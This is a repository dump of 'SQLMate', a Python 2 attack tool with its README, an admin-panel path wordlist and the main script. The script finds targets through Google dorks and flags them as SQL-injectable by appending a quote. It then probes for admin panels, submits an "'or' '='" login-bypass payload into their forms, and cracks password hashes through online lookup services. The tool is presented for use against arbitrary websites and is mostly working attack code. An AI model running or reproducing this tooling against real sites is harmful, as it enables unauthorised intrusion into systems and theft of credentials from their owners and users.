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But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # sqlmate 2 | 3 | There are some features that we think SQLMap should have. Like finding admin panel of the target, better hash cracking etc. If you think the same, SQLMate is for you. 4 | 5 | ## What it does? 6 | - Feed it a SQL injection dork via --dork option and it will find vulnerable sites for you. After that, it will try to find their admin panels and also try to bypass them with SQL queries. 7 | 8 | - It can do very fast hash lookups for MD5, SHA1 and SHA2. You can supply a hash with --hash option. Average lookup takes less than 2 seconds. 9 | 10 | - You can also supply it a txt file containing hashes to be cracked with --list option. 11 | 12 | - The first mode just checks for 13 most common admin panel locations but if you feed a website through --admin option, you can do a full scan using 482 paths. 13 | 14 | - SQLMate has ability to scrap dorks as well. Specify dumping level via --dump option. Using --dump 1 will dump nearly 20 dorks so set the level anywhere between 1-184 as per your needs. SQLMate automatically saves the dorks into a txt file so you can use them later. 15 | 16 | Scroll down for more. 17 | 18 | ### Screenshots 19 | 20 | 21 | 22 | 23 | 24 | #### Running SQLMate 25 | Enter the following command in terminal to download SQLMate 26 | ``` 27 | git clone https://github.com/UltimateHackers/sqlmate 28 | ``` 29 | Then navigate to the sqlmate directory by entering this command 30 | ``` 31 | cd sqlmate 32 | ``` 33 | Now install the required modules 34 | ``` 35 | pip install -r requirements.txt 36 | ``` 37 | Now run sqlmate 38 | ``` 39 | python sqlmate 40 | ``` 41 | 42 | ##### Available command line options 43 | ``` 44 | usage: sqlmate [-h] [--dork DORK] [--hash HASH] [--list ] 45 | [--dump 1-184] [--admin URL] [--type PHP,ASP,HTML] 46 | 47 | optional arguments: 48 | -h, --help show this help message and exit 49 | --dork DORK Supply a dork and let SQLMate do its thing 50 | --hash HASH 'Crack' a hash in 5 secs 51 | --list Import and crack hashes from a txt file 52 | --dump 1-184 Get dorks. Specify dumping level. Level 1 = 20 dorks 53 | --admin URL Find admin panel of website 54 | --type PHP,ASP,HTML Choose extension to scan (Use with --admin option, 55 | Default is all) 56 | ``` 57 | #### Want to contribute? 58 | Alright jump in! Find bugs or help me add these features: 59 | - [ ] Avoiding duplicates in dork scan results 60 | - [ ] A list of examples of sqlmap commands demonstrating some useful and less known sqlmap options 61 | - [ ] Whatever you like 62 | 63 | Thanks for using SQLMate. 64 | -------------------------------------------------------------------------------- /paths.txt: -------------------------------------------------------------------------------- 1 | /acceso.asp 2 | /acceso.php 3 | /access/ 4 | /access.php 5 | /account/ 6 | /account.asp 7 | /account.html 8 | /account.php 9 | /acct_login/ 10 | /_adm_/ 11 | /_adm/ 12 | /adm/ 13 | /adm2/ 14 | /adm/admloginuser.asp 15 | /adm/admloginuser.php 16 | /adm.asp 17 | /adm_auth.asp 18 | /adm_auth.php 19 | /adm.html 20 | /_admin_/ 21 | /_admin/ 22 | /admin/ 23 | /Admin/ 24 | /ADMIN/ 25 | /admin1/ 26 | /admin1.asp 27 | /admin1.html 28 | /admin1.php 29 | /admin2/ 30 | /admin2.asp 31 | /admin2.html 32 | /admin2/index/ 33 | /admin2/index.asp 34 | /admin2/index.php 35 | /admin2/login.asp 36 | /admin2/login.php 37 | /admin2.php 38 | /admin3/ 39 | /admin4/ 40 | /admin4_account/ 41 | /admin4_colon/ 42 | /admin5/ 43 | /admin/account.asp 44 | /admin/account.html 45 | /admin/account.php 46 | /admin/add_banner.php/ 47 | /admin/addblog.php 48 | /admin/add_gallery_image.php 49 | /admin/add.php 50 | /admin/add-room.php 51 | /admin/add-slider.php 52 | /admin/add_testimonials.php 53 | /admin/admin/ 54 | /admin/adminarea.php 55 | /admin/admin.asp 56 | /admin/AdminDashboard.php 57 | /admin/admin-home.php 58 | /admin/AdminHome.php 59 | /admin/admin.html 60 | /admin/admin_index.php 61 | /admin/admin_login.asp 62 | /admin/admin-login.asp 63 | /admin/adminLogin.asp 64 | /admin/admin_login.html 65 | /admin/admin-login.html 66 | /admin/adminLogin.html 67 | /admin/admin_login.php 68 | /admin/admin-login.php 69 | /admin/adminLogin.php 70 | /admin/admin_management.php 71 | /admin/admin.php 72 | /admin/admin_users.php 73 | /admin/adminview.php 74 | /admin/adm.php 75 | /admin_area/ 76 | /adminarea/ 77 | /admin_area/admin.asp 78 | /adminarea/admin.asp 79 | /admin_area/admin.html 80 | /adminarea/admin.html 81 | /admin_area/admin.php 82 | /adminarea/admin.php 83 | /admin_area/index.asp 84 | /adminarea/index.asp 85 | /admin_area/index.html 86 | /adminarea/index.html 87 | /admin_area/index.php 88 | /adminarea/index.php 89 | /admin_area/login.asp 90 | /adminarea/login.asp 91 | /admin_area/login.html 92 | /adminarea/login.html 93 | /admin_area/login.php 94 | /adminarea/login.php 95 | /admin.asp 96 | /admin/banner.php 97 | /admin/banners_report.php 98 | /admin/category.php 99 | /admin/change_gallery.php 100 | /admin/checklogin.php 101 | /admin/configration.php 102 | /admincontrol.asp 103 | /admincontrol.html 104 | /admincontrol/login.asp 105 | /admincontrol/login.html 106 | /admincontrol/login.php 107 | /admin/control_pages/admin_home.php 108 | /admin/controlpanel.asp 109 | /admin/controlpanel.html 110 | /admin/controlpanel.php 111 | /admincontrol.php 112 | /admincontrol.php/ 113 | /admin/cpanel.php 114 | /admin/cp.asp 115 | /admin/CPhome.php 116 | /admin/cp.html 117 | /admincp/index.asp 118 | /admincp/index.html 119 | /admincp/login.asp 120 | /admin/cp.php 121 | /admin/dashboard/index.php 122 | /admin/dashboard.php 123 | /admin/dashbord.php 124 | /admin/dash.php 125 | /admin/default.php 126 | /adm/index.asp 127 | /adm/index.html 128 | /adm/index.php 129 | /admin/enter.php 130 | /admin/event.php 131 | /admin/form.php 132 | /admin/gallery.php 133 | /admin/headline.php 134 | /admin/home.asp 135 | /admin/home.html 136 | /admin_home.php 137 | /admin/home.php 138 | /admin.html 139 | /admin/index.asp 140 | /admin/index-digital.php 141 | /admin/index.html 142 | /admin/index.php 143 | /admin/index_ref.php 144 | /admin/initialadmin.php 145 | /administer/ 146 | /administr8/ 147 | /administr8.asp 148 | /administr8.html 149 | /administr8.php 150 | /administracion.php 151 | /administrador/ 152 | /administratie/ 153 | /administration/ 154 | /administration.html 155 | /administration.php 156 | /administrator 157 | /_administrator_/ 158 | /_administrator/ 159 | /administrator/ 160 | /administrator/account.asp 161 | /administrator/account.html 162 | /administrator/account.php 163 | /administratoraccounts/ 164 | /administrator.asp 165 | /administrator.html 166 | /administrator/index.asp 167 | /administrator/index.html 168 | /administrator/index.php 169 | /administratorlogin/ 170 | /administrator/login.asp 171 | /administratorlogin.asp 172 | /administrator/login.html 173 | /administrator/login.php 174 | /administratorlogin.php 175 | /administratorlogin.php 176 | /administrator.php 177 | /administrators/ 178 | /administrivia/ 179 | /admin/leads.php 180 | /admin/list_gallery.php 181 | /admin/login 182 | /adminLogin/ 183 | /admin_login.asp 184 | /admin-login.asp 185 | /admin/login.asp 186 | /adminLogin.asp 187 | /admin/login-home.php 188 | /admin_login.html 189 | /admin-login.html 190 | /admin/login.html 191 | /adminLogin.html 192 | /ADMIN/login.html 193 | /admin_login.php 194 | /admin_login.php] 195 | /admin-login.php 196 | /admin-login.php/ 197 | /admin/login.php 198 | /adminLogin.php 199 | /ADMIN/login.php 200 | /admin/login_success.php 201 | /admin/loginsuccess.php 202 | /admin/log.php 203 | /admin_main.html 204 | /admin/main_page.php 205 | /admin/main.php/ 206 | /admin/ManageAdmin.php 207 | /admin/manageImages.php 208 | /admin/manage_team.php 209 | /admin/member_home.php 210 | /admin/moderator.php 211 | /admin/my_account.php 212 | /admin/myaccount.php 213 | /admin/overview.php 214 | /admin/page_management.php 215 | /admin/pages/home_admin.php 216 | /adminpanel/ 217 | /adminpanel.asp 218 | /adminpanel.html 219 | /adminpanel.php 220 | /admin.php 221 | /Admin/private/ 222 | /adminpro/ 223 | /admin/product.php 224 | /admin/products.php 225 | /admins/ 226 | /admins.asp 227 | /admin/save.php 228 | /admins.html 229 | /admin/slider.php 230 | /admin/specializations.php 231 | /admins.php 232 | /admin_tool/ 233 | /AdminTools/ 234 | /admin/uhome.html 235 | /admin/upload.php 236 | /admin/userpage.php 237 | /admin/viewblog.php 238 | /admin/viewmembers.php 239 | /admin/voucher.php 240 | /AdminWeb/ 241 | /admin/welcomepage.php 242 | /admin/welcome.php 243 | /admloginuser.asp 244 | /admloginuser.php 245 | /admon/ 246 | /ADMON/ 247 | /adm.php 248 | /affiliate.asp 249 | /affiliate.php 250 | /auth/ 251 | /auth/login/ 252 | /authorize.php 253 | /autologin/ 254 | /banneradmin/ 255 | /base/admin/ 256 | /bb-admin/ 257 | /bbadmin/ 258 | /bb-admin/admin.asp 259 | /bb-admin/admin.html 260 | /bb-admin/admin.php 261 | /bb-admin/index.asp 262 | /bb-admin/index.html 263 | /bb-admin/index.php 264 | /bb-admin/login.asp 265 | /bb-admin/login.html 266 | /bb-admin/login.php 267 | /bigadmin/ 268 | /blogindex/ 269 | /cadmins/ 270 | /ccms/ 271 | /ccms/index.php 272 | /ccms/login.php 273 | /ccp14admin/ 274 | /cms/ 275 | /cms/admin/ 276 | /cmsadmin/ 277 | /cms/_admin/logon.php 278 | /cms/login/ 279 | /configuration/ 280 | /configure/ 281 | /controlpanel/ 282 | /controlpanel.asp 283 | /controlpanel.html 284 | /controlpanel.php 285 | /cpanel/ 286 | /cPanel/ 287 | /cpanel_file/ 288 | /cp.asp 289 | /cp.html 290 | /cp.php 291 | /customer_login/ 292 | /database_administration/ 293 | /Database_Administration/ 294 | /db/admin.php 295 | /directadmin/ 296 | /dir-login/ 297 | /editor/ 298 | /edit.php 299 | /evmsadmin/ 300 | /ezsqliteadmin/ 301 | /fileadmin/ 302 | /fileadmin.asp 303 | /fileadmin.html 304 | /fileadmin.php 305 | /formslogin/ 306 | /forum/admin 307 | /globes_admin/ 308 | /home.asp 309 | /home.html 310 | /home.php 311 | /hpwebjetadmin/ 312 | /include/admin.php 313 | /includes/login.php 314 | /Indy_admin/ 315 | /instadmin/ 316 | /interactive/admin.php 317 | /irc-macadmin/ 318 | /links/login.php 319 | /LiveUser_Admin/ 320 | /login/ 321 | /login1/ 322 | /login.asp 323 | /login_db/ 324 | /loginflat/ 325 | /login.html 326 | /login/login.php 327 | /login.php 328 | /login-redirect/ 329 | /logins/ 330 | /login-us/ 331 | /logon/ 332 | /logo_sysadmin/ 333 | /Lotus_Domino_Admin/ 334 | /macadmin/ 335 | /mag/admin/ 336 | /maintenance/ 337 | /manage_admin.php 338 | /manager/ 339 | /manager/ispmgr/ 340 | /manuallogin/ 341 | /memberadmin/ 342 | /memberadmin.asp 343 | /memberadmin.php 344 | /members/ 345 | /memlogin/ 346 | /meta_login/ 347 | /modelsearch/admin.asp 348 | /modelsearch/admin.html 349 | /modelsearch/admin.php 350 | /modelsearch/index.asp 351 | /modelsearch/index.html 352 | /modelsearch/index.php 353 | /modelsearch/login.asp 354 | /modelsearch/login.html 355 | /modelsearch/login.php 356 | /moderator/ 357 | /moderator/admin.asp 358 | /moderator/admin.html 359 | /moderator/admin.php 360 | /moderator.asp 361 | /moderator.html 362 | /moderator/login.asp 363 | /moderator/login.html 364 | /moderator/login.php 365 | /moderator.php 366 | /moderator.php/ 367 | /myadmin/ 368 | /navSiteAdmin/ 369 | /newsadmin/ 370 | /nsw/admin/login.php 371 | /openvpnadmin/ 372 | /pages/admin/admin-login.asp 373 | /pages/admin/admin-login.html 374 | /pages/admin/admin-login.php 375 | /panel/ 376 | /panel-administracion/ 377 | /panel-administracion/admin.asp 378 | /panel-administracion/admin.html 379 | /panel-administracion/admin.php 380 | /panel-administracion/index.asp 381 | /panel-administracion/index.html 382 | /panel-administracion/index.php 383 | /panel-administracion/login.asp 384 | /panel-administracion/login.html 385 | /panel-administracion/login.php 386 | /panelc/ 387 | /paneldecontrol/ 388 | /panel.php 389 | /pgadmin/ 390 | /phpldapadmin/ 391 | /phpmyadmin/ 392 | /phppgadmin/ 393 | /phpSQLiteAdmin/ 394 | /platz_login/ 395 | /pma/ 396 | /power_user/ 397 | /project-admins/ 398 | /pureadmin/ 399 | /radmind/ 400 | /radmind-1/ 401 | /rcjakar/admin/login.php 402 | /rcLogin/ 403 | /server/ 404 | /Server/ 405 | /ServerAdministrator/ 406 | /server_admin_small/ 407 | /Server.asp 408 | /Server.html 409 | /Server.php 410 | /showlogin/ 411 | /simpleLogin/ 412 | /site/admin/ 413 | /siteadmin/ 414 | /siteadmin/index.asp 415 | /siteadmin/index.php 416 | /siteadmin/login.asp 417 | /siteadmin/login.html 418 | /site_admin/login.php 419 | /siteadmin/login.php 420 | /smblogin/ 421 | /sql-admin/ 422 | /sshadmin/ 423 | /ss_vms_admin_sm/ 424 | /staradmin/ 425 | /sub-login/ 426 | /Super-Admin/ 427 | /support_login/ 428 | /sys-admin/ 429 | /sysadmin/ 430 | /SysAdmin/ 431 | /SysAdmin2/ 432 | /sysadmin.asp 433 | /sysadmin.html 434 | /sysadmin.php 435 | /sysadmins/ 436 | /system_administration/ 437 | /system-administration/ 438 | /typo3/ 439 | /ur-admin/ 440 | /ur-admin.asp 441 | /ur-admin.html 442 | /ur-admin.php 443 | /useradmin/ 444 | /user.asp 445 | /user.html 446 | /UserLogin/ 447 | /user.php 448 | /usuario/ 449 | /usuarios/ 450 | /usuarios// 451 | /usuarios/login.php 452 | /utility_login/ 453 | /vadmind/ 454 | /vmailadmin/ 455 | /webadmin/ 456 | /WebAdmin/ 457 | /webadmin/admin.asp 458 | /webadmin/admin.html 459 | /webadmin/admin.php 460 | /webadmin.asp 461 | /webadmin.html 462 | /webadmin/index.asp 463 | /webadmin/index.html 464 | /webadmin/index.php 465 | /webadmin/login.asp 466 | /webadmin/login.html 467 | /webadmin/login.php 468 | /webadmin.php 469 | /webmaster/ 470 | /websvn/ 471 | /wizmysqladmin/ 472 | /wp-admin/ 473 | /wp-login/ 474 | /wplogin/ 475 | /wp-login.php 476 | /xlogin/ 477 | /yonetici.asp 478 | /yonetici.html 479 | /yonetici.php 480 | /yonetim.asp 481 | /yonetim.html 482 | /yonetim.php -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | mechanize==0.2.5 2 | beautifulsoup4==4.4.1 3 | argparse==1.2.1 4 | requests 5 | -------------------------------------------------------------------------------- /sqlmate: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # -- coding: utf-8 -- 3 | 4 | from bs4 import BeautifulSoup 5 | import requests 6 | from re import search, findall 7 | from urllib import unquote 8 | from HTMLParser import HTMLParser 9 | from urlparse import urlparse 10 | import mechanize 11 | import datetime 12 | import argparse #module for parsing command line arguments 13 | import sys 14 | reload(sys) 15 | sys.setdefaultencoding('utf8') 16 | 17 | print '''\033[1;93m 18 | ___ 19 | __H__ _ 20 | ___ ___|\033[41m.\033[0m\033[1;93m|_____ ___| |_ ___ \033[1;97m{\033[90m0.8#stable\033[1;97m}\033[1;93m 21 | |_ -| . |\033[41m.\033[0m\033[1;93m| | .'| _| -_| 22 | |___|_ |\033[41m.\033[0m\033[1;93m|_|_|_|__,|_| |___| 23 | |_|V \033[0m\033[4;37mteamultimate.in\033[0m 24 | ''' 25 | 26 | parser = argparse.ArgumentParser() #defines the parser 27 | parser.add_argument("--dork", help="Supply a dork and let SQLMate do its thing", dest='dork', nargs='+') 28 | parser.add_argument("--hash", help="'Crack' a hash in 5 secs", dest='hash') 29 | parser.add_argument("--list", help="Import and crack hashes from a txt file", dest='hashlist', metavar='') 30 | parser.add_argument("--dump", help="Get dorks. Specify dumping level. Level 1 = 20 dorks", dest='page', metavar='1-184') 31 | parser.add_argument("--admin", help="Find admin panel of website", dest='admin', metavar='URL') 32 | parser.add_argument("--type", help="Choose extension to scan (Use with --admin option, Default is all)", dest='type', metavar='PHP,ASP,HTML') 33 | args = parser.parse_args() 34 | if args.dork: 35 | ' '.join(args.dork) 36 | 37 | if not args.dork and not args.hash and not args.hashlist and not args.admin and not args.page: 38 | help = parser.format_help() 39 | help = help.replace('[DORK ...]\n','').replace(' ','').replace(' [DORK ...]','') 40 | help = help.replace('Default','\t\tDefault') 41 | print help 42 | print '' 43 | args.dork = 'Blank' 44 | 45 | br = mechanize.Browser() 46 | 47 | wordlist = ['admin/', 'admin.php', 'administrator/', 'login.php', 'login/', 'login.html', 'admin.html', 'admin/admin.php', 48 | 'admin_login.php', 'admin/account.php', 'admin/login.php', 'login/login.php', 'login/admin.php'] 49 | 50 | paths = [] 51 | targets = [] 52 | vul_targets = [] 53 | logins = [] 54 | null = [] 55 | num = 0 56 | hashes = [] 57 | cracked = [] 58 | start = ['0', '10', '20', '30'] 59 | dorks = [] 60 | 61 | ################################ 62 | # Function for Dorking # 63 | ################################ 64 | 65 | def google(dork, number): 66 | url = 'https://www.google.co.in/search?q=' + dork + '&start=' + number 67 | r = requests.get(url) 68 | data = r.text 69 | if 'Our systems have detected unusual traffic from your computer network' in data: 70 | print "\033[1;31m[-]\033[0m Captcha Detected!" 71 | google = 'https://www.google.co.in/search?q=' + dork + '&start=' + number 72 | url = 'http://source.domania.net/cgi-bin/source.cgi' 73 | data = requests.post(url, data='url='+google).text 74 | data = HTMLParser().unescape(data) 75 | if 'Our systems have detected unusual traffic from your computer network' in data: 76 | print "\033[1;31m[-]\033[0m Google blocked our IP! Are you mad bro? Take a break." 77 | match = search(r'url\?q=[^<]*&', data) 78 | if match: 79 | clean_link = unquote(unquote(match.group().split('url?q=')[1][:-5])) 80 | targets.append(clean_link) 81 | else: 82 | pass 83 | soup = BeautifulSoup(data, 'html.parser') 84 | links = soup.find_all("h3") 85 | if len(links) == 0: 86 | pass 87 | for row in links: 88 | for link in row.find_all("a"): 89 | source = (link.get('href')) 90 | match = search(r'/url\?q=[^<]*&sa=', source) 91 | if match: 92 | clean_link = unquote(unquote(match.group().split('/url?q=')[1][:-4])) 93 | if '=' in clean_link: 94 | targets.append(clean_link) 95 | else: 96 | pass 97 | if len(links) < 10: 98 | null.append(1) 99 | 100 | ################################################################# 101 | # Mod of Breacher (https://gihub.com/UltimateHackers/Breacher) # 102 | ################################################################# 103 | 104 | def admin(): 105 | for link in vul_targets: #fetches one link from the links list 106 | parsed_uri = urlparse(link) 107 | domain = '{uri.scheme}://{uri.netloc}/'.format(uri=parsed_uri) 108 | for suffix in wordlist: 109 | try: 110 | response = domain + suffix # Does this--> example.com/admin/ 111 | r = requests.get(response) #Requests to the combined url 112 | http = r.status_code #Fetches the http response code 113 | if http == 200: #if its 200 the url points to valid resource i.e. admin panel 114 | print '\033[1;32m[+]\033[0m Admin panel found: %s'% response 115 | logins.append(response) 116 | break 117 | else: 118 | pass 119 | except: 120 | pass 121 | 122 | def admin_e(link): 123 | for suffix in paths: 124 | try: 125 | response = link + suffix # Does this--> example.com/admin/ 126 | r = requests.get(response) #Requests to the combined url 127 | http = r.status_code #Fetches the http response code 128 | if http == 200: #if its 200 the url points to valid resource i.e. admin panel 129 | print '\033[1;32m[+]\033[0m Admin panel found: %s'% response 130 | else: 131 | print '\033[1;31m[-]\033[1;0m %s'% response 132 | except: 133 | pass 134 | 135 | def get_paths(type): 136 | try: 137 | with open('paths.txt','r') as wordlist: #opens paths.txt and grabs links according to the type arguemnt 138 | for path in wordlist: #too boring to describe 139 | path = str(path.replace("\n","")) 140 | try: 141 | if 'asp' in type: 142 | if 'html' in path or 'php' in path: 143 | pass 144 | else: 145 | paths.append(path) 146 | if 'php' in type: 147 | if 'asp' in path or 'html' in path: 148 | pass 149 | else: 150 | paths.append(path) 151 | if 'html' in type: 152 | if 'asp' in path or 'php' in path: 153 | pass 154 | else: 155 | paths.append(path) 156 | except: 157 | paths.append(path) 158 | except IOError: 159 | print"\033[1;31m[-]\033[1;m paths.txt not found!" 160 | quit() 161 | 162 | ################################################ 163 | # Function for scarping/dumping dorks # 164 | ################################################ 165 | 166 | def get_dorks(page): 167 | for page in range(int(page)): 168 | print "\033[1;32m[+]\033[0m Finding dorks on page %i"%(page + 1) 169 | url = 'https://cxsecurity.com/dorks/' + str(page) 170 | response = requests.get(url).text 171 | response = HTMLParser().unescape(response) 172 | response = unicode(response) 173 | matches = findall(r'Dork:[^<]*', response) 174 | if matches: 175 | for match in matches: 176 | try: 177 | match = match.replace('Dork:', '').replace('','') 178 | dorks.append(match) 179 | except: 180 | pass 181 | now = datetime.datetime.now() 182 | filename = ("dorks%i:%i.txt"%(now.hour,now.minute)) 183 | with open(filename, "a") as f: 184 | for dork in dorks: 185 | f.write(dork + '\n') 186 | print '\033[1;32m[+]\033[0m Dorks dumped in %s'% filename 187 | 188 | ############################################################ 189 | # Mod of Blazy (https://github.com/UltimateHackers/Blazy) 190 | ############################################################ 191 | 192 | def bypass(): 193 | def find(url, i_title, original): #Function for finding forms 194 | form_number = 0 195 | for f in forms: #Finds all the forms in the webpage 196 | data = str(f) #Converts the response recieved to string 197 | username = search(r'', data) #Searches for fields that accept plain text 198 | 199 | if username: #if such field is found 200 | username = (username.group().split('', data) #Searchs for fields that accept password like text 202 | 203 | if passwd: #if such field is found 204 | passwd = (passwd.group().split('', data) #select_o is the name of menu 210 | 211 | if select_o: #Proceeds to find options of menu 212 | menu = "True" #Sets the menu to be true 213 | options = (select_o.group().split('=')[1][:-1]) #Extracts options 214 | print '\n\033[1;33m[!]\033[0m A drop down menu detected.' 215 | print '\033[1;33m[!]\033[0m Menu name: ' + name #prints menu name 216 | print '\033[1;33m[!]\033[0m Options available: ' + options #prints available options 217 | option = raw_input('\033[1;34m[?]\033[0m Please Select an option:>> ') #Gets option from user 218 | brute(username, passwd, menu, option, name, form_number, i_title, original) #Calls the bruteforce function 219 | else: 220 | menu = "False" #No menu is present in the form 221 | brute(username, passwd, menu, option, name, form_number, i_title, original) #Calls the bruteforce function 222 | else: 223 | menu = "False" #No menu is present in the form 224 | option = "" #Sets option to null 225 | name = "" #Sets name to null 226 | brute(username, passwd, menu, option, name, form_number, i_title, original) #Calls the bruteforce function 227 | else: 228 | form_number = form_number + 1 229 | else: 230 | form_number = form_number + 1 231 | def brute(username, passwd, menu, option, name, form_number, i_title, original): 232 | br.open(url) 233 | br.select_form(nr=form_number) 234 | br.form[username] = "'or' '='" 235 | br.form[passwd] = "'or' '='" 236 | if menu == "False": 237 | pass 238 | elif menu == "True": 239 | br.form[name] = [option] 240 | else: 241 | pass 242 | resp = br.submit() 243 | data = resp.read() 244 | data_low = data.lower() 245 | if 'username or password' in data_low: 246 | pass 247 | else: 248 | soup = BeautifulSoup(data, 'lxml') 249 | i_title = soup.find('title') 250 | if i_title == None: 251 | data = data.lower() 252 | if 'logout' in data: 253 | print '\n\033[1;32m[+]\033[0m Login page is vulnerable to SQLi' 254 | else: 255 | pass 256 | else: 257 | injected = i_title.contents 258 | if original != injected: 259 | print '\n\033[1;32m[+]\033[0m Login page is vulnerable to SQLi' 260 | else: 261 | pass 262 | for url in logins: 263 | br.open(url) 264 | data = br.open(url).read() #Reads the response 265 | forms = br.forms() #Finds all the forms present in webpage 266 | soup = BeautifulSoup(data, 'lxml') #Pareses the response with beuatiful soup 267 | i_title = soup.find('title') #finds the title tag 268 | original = None 269 | if i_title != None: 270 | original = i_title.contents #value of title tag is assigned to 'original' 271 | find(url, i_title, original) 272 | ################################### 273 | # Error Based SQLi Scanner 274 | ################################### 275 | 276 | def scan(): 277 | for url in targets: 278 | try: 279 | response = requests.get(url + "'", timeout=5).text 280 | if 'error' in response and 'syntax' in response or 'MySQL' in response: 281 | print '\033[1;32m[+]\033[0m ' + url 282 | vul_targets.append(url) 283 | else: 284 | print '\033[1;31m[-]\033[0m ' + url 285 | except: 286 | pass 287 | 288 | 289 | ######################################################################### 290 | # Mod of Hash-Buster (https://github.com/UltimateHackers/Hash-Buster) # 291 | ######################################################################### 292 | 293 | def HashBuster(hashvalue): 294 | def omega(hashvalue): 295 | data = {"hash":hashvalue, "decrypt":"Decrypt"} 296 | html = requests.post("http://md5decrypt.net/en/Sha256/", data=data) 297 | find = html.text 298 | match = search (r'[^<]*

', find) 299 | if match: 300 | print "\033[1;32m[+]\033[0m %s : "%hashvalue, match.group().split('')[1][:-14] 301 | else: 302 | cracked.append(1) 303 | 304 | def Lambda(hashvalue): 305 | html = requests.get("http://md5decrypt.net/Api/api.php?hash="+hashvalue+"&hash_type=sha256&email=deanna_abshire@proxymail.eu&code=1152464b80a61728") 306 | find = html.text 307 | if len(find) > 0: 308 | print "\033[1;32m[+]\033[0m %s : "%hashvalue, find 309 | else: 310 | cracked.append(1) 311 | def beta(hashvalue): 312 | data = {"auth":"8272hgt", "hash":hashvalue, "string":"","Submit":"Submit"} 313 | html = requests.post("http://hashcrack.com/index.php" , data=data) 314 | find = html.text 315 | match = search (r'[^<]*', find) 316 | if match: 317 | print "\033[1;32m[+]\033[0m %s : "%hashvalue, match.group().split('hervorheb2>')[1][:-18] 318 | else: 319 | omega(hashvalue) 320 | if len(hashvalue) == 32: 321 | data = {"hash":hashvalue,"submit":"Decrypt It!"} 322 | html = requests.post("http://md5decryption.com", data=data) 323 | find = html.text 324 | match = search(r"Decrypted Text: [^<]*", find) 325 | if match: 326 | print "\033[1;32m[+]\033[0m %s : "%hashvalue, match.group().split('b>')[1][:-7] 327 | elif match == None: 328 | data = {"md5":hashvalue,"x":"21","y":"8"} 329 | html = requests.post("http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php", data=data) 330 | find = html.text 331 | match = search (r"Hashed string: [^<]*", find) 332 | if match: 333 | print "\033[1;32m[+]\033[0m %s : "%hashvalue, match.group().split('span')[2][3:-6] 334 | elif match == None: 335 | url = "http://www.nitrxgen.net/md5db/" + hashvalue 336 | purl = requests.get(url).text 337 | if len(purl) > 0: 338 | print "\033[1;32m[+]\033[0m %s : "%hashvalue, purl 339 | elif len(purl) == 0: 340 | cracked.append(1) 341 | elif len(hashvalue) == 40: 342 | beta(hashvalue) 343 | elif len(hashvalue) == 64: 344 | Lambda(hashvalue) 345 | else: 346 | cracked.append(1) 347 | 348 | ####################### 349 | # Lets run this shit # 350 | ####################### 351 | 352 | if args.dork: 353 | if args.dork == 'Blank': 354 | dork = raw_input('\033[1;34m[?]\033[0m Enter Dork: ') 355 | else: 356 | dork = ' '.join(args.dork) 357 | print '\n\033[1;97m[>]\033[1;m Finding targets for my mate, SQLmap\n' 358 | for number in start: 359 | if len(null) == 0: 360 | google(dork, number) 361 | else: 362 | break 363 | scan() 364 | print '\n\033[1;97m[>]\033[1;m You will also need their admin panels right? Wait a minute..\n' 365 | admin() 366 | print '\n\033[1;97m[>]\033[1;mLet me try to bypass logins. I want to show SQLmap that I am not a noob.\n' 367 | bypass() 368 | 369 | if args.hash: 370 | hashvalue = args.hash 371 | HashBuster(hashvalue) 372 | if len(cracked) != 0: 373 | print "\033[1;31m[-]\033[1;m Sorry this hash is not present in our database." 374 | 375 | if args.hashlist: 376 | try: 377 | hashfile = args.hashlist 378 | with open(hashfile,'r') as f: #Importing Payloads from specified wordlist. 379 | for line in f: 380 | hash = str(line.replace("\n","")) 381 | hashes.append(hash) 382 | for hashvalue in hashes: 383 | HashBuster(hashvalue) 384 | except IOError: 385 | print "[!] File not found." 386 | if len(cracked) == len(hashes): 387 | print "\033[1;31m[-]\033[1;m Looks the hashes you are trying to crack aren't supported" 388 | 389 | if args.admin: 390 | type = args.type 391 | get_paths(type) 392 | link = args.admin 393 | if 'http://' in link or 'https://' in link: 394 | pass 395 | else: 396 | link = 'http://' + link 397 | admin_e(link) 398 | if args.page: 399 | page = args.page 400 | get_dorks(page) 401 | --------------------------------------------------------------------------------